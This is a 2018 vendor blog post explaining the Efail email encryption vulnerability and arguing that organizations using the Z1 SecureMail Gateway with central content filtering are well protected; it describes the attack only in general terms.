What does Efail mean for companies?

Comments & Campaigns | 30. MAY 2018

Why email encryption using the Z1 SecureMail Gateway remains a secure option

Sicherheitslücke EfailAfter the first wave of misinformation, it should have meanwhile spread that the email encryption has not been cracked by the security gap Efail and that the German Federal Office for information Security (BSI) continues to recommend the encryption of emails. Generally speaking, companies that use professional encryption solutions in professional infrastructures do not need to worry.

The fact is, companies or public authorities that utilize Z1 SecureMail Gateway for email encryption against Efail and other types of attacks on emails, generally have an advantage over private users and companies with single workstation solutions for email encryption. In professional infrastructures, the encryption and content preparation for displaying emails are separate procedures, which is why a manipulation such as by Efail should have virtually no chance of success (you can find details about the attack at efail.de).

The path of an incoming email in a professional IT environment using the Z1 SecureMail Gateway

  1. Z1 SecureMail Gateway receives and decrypts emails at a central point in the company network. The Gateway does not process the contents of the decrypted email. This prevents the Gateway from potentially running any code that may have infiltrated through which information could be evaluated or rerouted.
  2. The Gateway routes the encrypted email through the firewall protected company network in plaintext directly to the content filter or virus scanner.
  3. The content filter / virus scanner then checks for and removes any malicious content in the encrypted email. This includes viruses, Trojans and ransomware, as well as any hidden HTML and JavaScript instructions – as in the case with Efail – that wants to send an email’s decrypted plaintext as a parameter to an external URL.
  4. The content filter relays the innocuous email on to the email server on which the recipient’s mailbox is located.
  5. The email is retrieved from the mailbox using the email client (e.g., Outlook or Thunderbird) and displayed to the user.

Only in the email client, can any potential malicious code that has not been detected and removed by the content filter be executed. This can be counteracted by restricting the display of the emails to plaintext.

In professional IT infrastructures, security settings are implemented centrally in order to minimize user errors. In utilizing the Z1 SecureMail Gateway, companies take advantage of the highly efficient centralized administration of organization-wide security.
The general concept of centralized IT security solutions is, through the use of standardized processes and automation, to relieve single users of responsibility. As a result, companies with the right infrastructure always have an advantage against attacks on poorly-configured end systems and terminal equipment, as well as potential user misconduct.